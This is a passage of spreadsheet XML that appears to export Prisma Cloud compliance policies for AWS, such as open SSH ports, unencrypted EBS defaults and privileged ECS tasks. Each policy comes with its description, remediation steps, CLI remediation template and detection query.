          <t>0351493c-9989-4b33-ad86-18dbe406e710</t>
        </is>
      </c>
      <c r="AJ30" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK30" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B31" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C31" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D31" t="n">
        <v>0</v>
      </c>
      <c r="E31" t="n">
        <v>37</v>
      </c>
      <c r="F31" t="n">
        <v>118</v>
      </c>
      <c r="G31" t="b">
        <v>1</v>
      </c>
      <c r="H31" t="inlineStr">
        <is>
          <t>ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, Critical Misconfigs to ServiceNow, DM_TEST,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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J31" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K31" t="inlineStr">
        <is>
          <t>AWS Security Group allows all traffic on SSH port (22)</t>
        </is>
      </c>
      <c r="L31" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M31" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N31" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O31" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P31" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q31" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R31" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S31" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T31" t="b">
        <v>1</v>
      </c>
      <c r="U31" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V31" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W31" t="inlineStr">
        <is>
          <t>This policy identifies Security groups that allow all traffic on SSH port 22. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. Review your list of security group rules to ensure that your resources are not exposed. As a best practice, restrict SSH solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X31" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Group reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the AWS Console
2. Navigate to the 'VPC' service
3. Select the 'Security Group' reported in the alert
4. Click on the 'Inbound Rule'
5. Remove the rule which has 'Source' value as 0.0.0.0/0 or ::/0 and 'Port Range' value as 22 (or range containing 22) 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security</t>
        </is>
      </c>
      <c r="Y31" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'ec2:RevokeSecurityGroupIngress' permission. Successful execution will update the security group to revoke the ingress rule records with port 22 open to all traffic either on IPv4 or on IPv6 protocol.",
'impact': 'Deletes the reported Security Group to restrict SSH traffic from all traffic',
'cliScriptTemplate': 'aws --region $region ec2 revoke-security-group-ingress --group-id $resourceId --ip-permissions \'["IpProtocol": "$protocol",
"FromPort": $fromPort,
"ToPort": $toPort,
"Ip$ipV4/6Ranges":["CidrIp$ipV4/6":"$cidr"]]\''</t>
        </is>
      </c>
      <c r="Z31" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[?any((ipRanges[*] contains 0.0.0.0/0 or ipv6Ranges[*].cidrIpv6 contains ::/0) and ((toPort == 22 or fromPort == 22) or (toPort &gt; 22 and fromPort &lt; 22)))] exists)
{"category":"Networking","resourceTypes":["aws_security_group","aws_security_group_rule"]}</t>
        </is>
      </c>
      <c r="AA31" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB31" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC31" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-23-CKV_AWS_24</t>
        </is>
      </c>
      <c r="AD31" t="b">
        <v>1</v>
      </c>
      <c r="AE31" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF31" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 - Notifications:email, AccountGroups:DM_TEST_NEW;,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 t="inlineStr">
        <is>
          <t>617b9138-584b-4e8e-ad15-7fbabafbed1a</t>
        </is>
      </c>
      <c r="AI31" t="inlineStr">
        <is>
          <t>62c42bbc-1764-408f-814c-68d2b392af1f</t>
        </is>
      </c>
      <c r="AJ31" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK31" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B32" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C32" s="2" t="inlineStr">
        <is>
          <t>Protective services</t>
        </is>
      </c>
      <c r="D32" t="inlineStr"/>
      <c r="E32" t="inlineStr"/>
      <c r="F32" t="inlineStr"/>
      <c r="G32" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J32" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K32" t="inlineStr">
        <is>
          <t>AWS VPC subnets should not allow automatic public IP assignment</t>
        </is>
      </c>
      <c r="L32" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M32" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N32" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O32" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P32" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q32" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R32" t="inlineStr">
        <is>
          <t>Protective services</t>
        </is>
      </c>
      <c r="S32" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Protective services</t>
        </is>
      </c>
      <c r="T32" t="b">
        <v>1</v>
      </c>
      <c r="U32" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V32" t="inlineStr">
        <is>
          <t>aws-ec2-describe-subnets</t>
        </is>
      </c>
      <c r="W32" t="inlineStr">
        <is>
          <t>This policy identifies VPC subnets which allow automatic public IP assignment. VPC subnet is a part of the VPC having its own rules for traffic. Assigning the Public IP to the subnet automatically (on launch) can accidentally expose the instances within this subnet to internet and should be edited to 'No' post creation of the Subnet.</t>
        </is>
      </c>
      <c r="X32" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console.
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to the 'VPC' service.
4. In the navigation pane, click on 'Subnets'.
5. Select the identified Subnet and choose the option 'Modify auto-assign IP settings' under the Subnet Actions.
6. Disable the 'Auto-Assign IP' option and save it. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default</t>
        </is>
      </c>
      <c r="Y32" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'ec2:ModifySubnetAttribute' permission. Successful execution will disable automatic public IP assignment for the respective Subnet.",
'impact': 'Disable automatic public IP assignment for the respective Subnet',
'cliScriptTemplate': 'aws ec2 modify-subnet-attribute --subnet-id $resourceId --region $region  --no-map-public-ip-on-launch'</t>
        </is>
      </c>
      <c r="Z32" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'AWS' and api.name = 'aws-ec2-describe-subnets' AND json.rule = 'mapPublicIpOnLaunch is true'
{"category":"Networking","resourceTypes":["aws_subnet"]}</t>
        </is>
      </c>
      <c r="AA32" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB32" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC32" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-41-CKV_AWS_130</t>
        </is>
      </c>
      <c r="AD32" t="b">
        <v>1</v>
      </c>
      <c r="AE32" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF32" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>11743cd3-35e4-4639-91e1-bc87b52d4cf5</t>
        </is>
      </c>
      <c r="AI32" t="inlineStr">
        <is>
          <t>11743cd3-35e4-4639-91e1-bc87b52d4cf5</t>
        </is>
      </c>
      <c r="AJ32" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK32" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B33" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C33" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D33" t="n">
        <v>0</v>
      </c>
      <c r="E33" t="n">
        <v>0</v>
      </c>
      <c r="F33" t="n">
        <v>475</v>
      </c>
      <c r="G33" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J33" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K33" t="inlineStr">
        <is>
          <t>AWS EBS volume region with encryption is disabled</t>
        </is>
      </c>
      <c r="L33" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M33" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N33" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O33" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P33" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q33" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R33" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S33" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T33" t="b">
        <v>0</v>
      </c>
      <c r="U33" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V33" t="inlineStr">
        <is>
          <t>aws-ec2-ebs-encryption</t>
        </is>
      </c>
      <c r="W33" t="inlineStr">
        <is>
          <t>This policy identifies AWS regions in which new EBS volumes are getting created without any encryption. Encrypting data at rest reduces unintentional exposure of data stored in EBS volumes. It is recommended to configure EBS volume at the regional level so that every new EBS volume created in that region will be enabled with encryption by using a provided encryption key.</t>
        </is>
      </c>
      <c r="X33" t="inlineStr">
        <is>
          <t>To enable encryption at region level by default, follow below URL:
 https://docs.aws.amazon.com/ebs/latest/userguide/work-with-ebs-encr.html#encryption-by-default
 Additional Information: 
 To detect existing EBS volumes that are not encrypted ; refer Saved Search:
 AWS EBS volumes are not encrypted_RL
 To detect existing EBS volumes that are not encrypted with CMK, refer Saved Search:
 AWS EBS volume not encrypted using Customer Managed Key_RL 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled</t>
        </is>
      </c>
      <c r="Y33" t="inlineStr"/>
      <c r="Z33" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-ebs-encryption' AND json.rule = ebsEncryptionByDefault is false as X; config from cloud.resource where api.name = 'aws-region' AND json.rule = optInStatus does not equal not-opted-in as Y; filter '$.X.region equals $.Y.regionName'; show X;
{"category":"Kubernetes","resourceTypes":["aws_ebs_encryption_by_default"]}</t>
        </is>
      </c>
      <c r="AA33" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB33" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC33" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-778-CKV_AWS_106</t>
        </is>
      </c>
      <c r="AD33" t="b">
        <v>1</v>
      </c>
      <c r="AE33" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF33" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>6960be11-e3a6-46cc-bf66-933c57c2af5d</t>
        </is>
      </c>
      <c r="AI33" t="inlineStr">
        <is>
          <t>7a951e9f-02d2-4d9f-9441-29b545084585</t>
        </is>
      </c>
      <c r="AJ33" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK33" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B34" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C34" s="2" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="D34" t="inlineStr"/>
      <c r="E34" t="inlineStr"/>
      <c r="F34" t="inlineStr"/>
      <c r="G34" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J34" t="inlineStr">
        <is>
          <t>aws-ecr</t>
        </is>
      </c>
      <c r="K34" t="inlineStr">
        <is>
          <t>AWS ECR Repository not configured with a lifecycle policy</t>
        </is>
      </c>
      <c r="L34" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M34" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N34" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O34" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P34" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q34" t="inlineStr">
        <is>
          <t>Detect</t>
        </is>
      </c>
      <c r="R34" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="S34" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Detection services</t>
        </is>
      </c>
      <c r="T34" t="b">
        <v>0</v>
      </c>
      <c r="U34" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V34" t="inlineStr">
        <is>
          <t>aws-ecr-get-repository-policy</t>
        </is>
      </c>
      <c r="W34" t="inlineStr">
        <is>
          <t>This policy identifies AWS ECR Repositories that are not configured with a lifecycle policy. Amazon ECR lifecycle policies enable you to specify the lifecycle management of images in a repository. This helps to automate the cleanup of unused images and the expiration of images based on age or count. As best practice, it is recommended to configure ECR repository with lifecycle policy which helps to avoid unintentionally using outdated images in your repository.</t>
        </is>
      </c>
      <c r="X34" t="inlineStr">
        <is>
          <t>To configure AWS ECR Repository with a lifecycle policy follow the steps mentioned in below URL:
https://docs.aws.amazon.com/AmazonECR/latest/userguide/lpp_creation.html</t>
        </is>
      </c>
      <c r="Y34" t="inlineStr"/>
      <c r="Z34" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecr-get-repository-policy' AND json.rule = lifecyclePolicy does not exist</t>
        </is>
      </c>
      <c r="AA34" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB34" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC34" t="inlineStr">
        <is>
          <t>PC-AWS-ECR-908</t>
        </is>
      </c>
      <c r="AD34" t="b">
        <v>1</v>
      </c>
      <c r="AE34" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF34" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>8377061b-355d-4fec-ad91-47f98f6f7912</t>
        </is>
      </c>
      <c r="AI34" t="inlineStr">
        <is>
          <t>94910ecb-934c-497a-ae32-f8874cc20ebb</t>
        </is>
      </c>
      <c r="AJ34" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK34" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B35" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C35" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D35" t="inlineStr"/>
      <c r="E35" t="inlineStr"/>
      <c r="F35" t="inlineStr"/>
      <c r="G35" t="b">
        <v>1</v>
      </c>
      <c r="H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lsekar,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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J35" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K35" t="inlineStr">
        <is>
          <t>AWS ECS cluster with container insights feature disabled</t>
        </is>
      </c>
      <c r="L35" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M35" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N35" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O35" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P35" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q35" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R35" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S35" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T35" t="b">
        <v>1</v>
      </c>
      <c r="U35" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V35" t="inlineStr">
        <is>
          <t>aws-ecs-cluster</t>
        </is>
      </c>
      <c r="W35" t="inlineStr">
        <is>
          <t>This policy identifies ECS clusters that are disabled with the container insights feature. Container Insights collects metrics at the cluster, task, and service levels. As a best practice, enable container insights to start collecting the data available through these logs for the reported ECS cluster.
For details:
https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/deploy-container-insights-ECS-cluster.html</t>
        </is>
      </c>
      <c r="X35" t="inlineStr">
        <is>
          <t>To enable container insights feature in your existing ECS cluster follow below mentioned URL:
https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/deploy-container-insights-ECS-cluster.html#deploy-container-insights-ECS-existing 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11</t>
        </is>
      </c>
      <c r="Y35" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'ecs:UpdateClusterSettings' permission. Successful execution will enable Container Insights for the reported AWS ECS cluster.",
'impact': 'Enables Container Insights for the reported AWS ECS cluster',
'cliScriptTemplate': 'aws ecs update-cluster-settings --cluster $resourceName --region $region --settings name=containerInsights,value=enabled'</t>
        </is>
      </c>
      <c r="Z35" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecs-cluster' AND json.rule = status equals ACTIVE and settings[?any(name equals containerInsights and value equals disabled)] exists
{"category":"Logging","resourceTypes":["aws_ecs_cluster"]}</t>
        </is>
      </c>
      <c r="AA35" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB35" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC35" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-718-CKV_AWS_65</t>
        </is>
      </c>
      <c r="AD35" t="b">
        <v>1</v>
      </c>
      <c r="AE35" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF35" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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lsekar - Notifications:, AccountGroups:Lsekar-AWSAccount;,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 t="inlineStr">
        <is>
          <t>ad3524a5-6f8f-4eab-9bd1-2a53850070db</t>
        </is>
      </c>
      <c r="AI35" t="inlineStr">
        <is>
          <t>577ef22c-f4c5-4a54-8aa0-cc6f58275777</t>
        </is>
      </c>
      <c r="AJ35" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK35" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B36" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C36" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D36" t="inlineStr"/>
      <c r="E36" t="inlineStr"/>
      <c r="F36" t="inlineStr"/>
      <c r="G36" t="b">
        <v>1</v>
      </c>
      <c r="H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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J36" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K36" t="inlineStr">
        <is>
          <t>AWS ECS task definition elevated privileges enabled</t>
        </is>
      </c>
      <c r="L36" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M36" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N36" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O36" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P36" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q36" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R36" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S36" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T36" t="b">
        <v>0</v>
      </c>
      <c r="U36" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V36" t="inlineStr">
        <is>
          <t>aws-ecs-describe-task-definition</t>
        </is>
      </c>
      <c r="W36" t="inlineStr">
        <is>
          <t>This policy identifies the ECS containers that are having elevated privileges on the host container instance. When the Privileged parameter is true, the container is given elevated privileges on the host container instance (similar to the root user).
Note: This parameter is not supported for Windows containers or tasks using the Fargate launch type.</t>
        </is>
      </c>
      <c r="X36" t="inlineStr">
        <is>
          <t>Create a task definition revision.
1. Open the Amazon ECS console.
2. From the navigation bar, choose the region that contains your task definition.
3. In the navigation pane, choose Task Definitions.
4. On the Task Definitions page, select the box to the left of the task definition to revise and choose Create new revision.
5. On the Create new revision of Task Definition page, change the existing Container Definitions.
6. Under Security, uncheck the Privileged box.
7. Verify the information and choose Update, then Create.
8. If your task definition is used in a service, update your service with the updated task definition.
9. Deactivate previous task definition 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-334
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-334</t>
        </is>
      </c>
      <c r="Y36" t="inlineStr"/>
      <c r="Z36" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecs-describe-task-definition' AND json.rule = status equals ACTIVE and containerDefinitions[*].privileged exists and containerDefinitions[*].privileged is true
{"category":"General","resourceTypes":["aws_ecs_task_definition"]}</t>
        </is>
      </c>
      <c r="AA36" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB36" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC36" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-400-CKV_AWS_334</t>
        </is>
      </c>
      <c r="AD36" t="b">
        <v>1</v>
      </c>
      <c r="AE36" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF36" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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6" t="inlineStr">
        <is>
          <t>869a1262-99f3-4d40-8207-3a80e4ba1dbd</t>
        </is>
      </c>
      <c r="AI36" t="inlineStr">
        <is>
          <t>7fd4dcdb-4210-466c-8b75-f8f8f11da92d</t>
        </is>
      </c>
      <c r="AJ36" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK36" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B37" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C37" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D37" t="inlineStr"/>
      <c r="E37" t="inlineStr"/>
      <c r="F37" t="inlineStr"/>
      <c r="G37" t="b">
        <v>1</v>
      </c>
      <c r="H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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J37" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K37" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (Classic) with access log disabled</t>
        </is>
      </c>
      <c r="L37" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M37" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N37" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O37" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P37" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q37" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R37" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S37" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T37" t="b">
        <v>0</v>
      </c>
      <c r="U37" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V37" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W37" t="inlineStr">
        <is>
          <t>This policy identifies Classic Elastic Load Balancers which have access log disabled. When Access log enabled, Classic load balancer captures detailed information about requests sent to your load balancer. Each log contains information such as the time the request was received, the client's IP address, latencies, request paths, and server responses. You can use these access logs to analyze traffic patterns and to troubleshoot issues.</t>
        </is>
      </c>
      <c r="X37" t="inlineStr">
        <is>
          <t>To enable access logging for Elastic Load Balancer (Classic), follow below mentioned URL:
https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-access-logs.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23</t>
        </is>
      </c>
      <c r="Y37" t="inlineStr"/>
      <c r="Z37" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = 'attributes.accessLog.enabled is false'
{"category":"Logging","resourceTypes":["aws_elb"]}</t>
        </is>
      </c>
      <c r="AA37" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB37" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC37" t="inlineStr">
        <is>
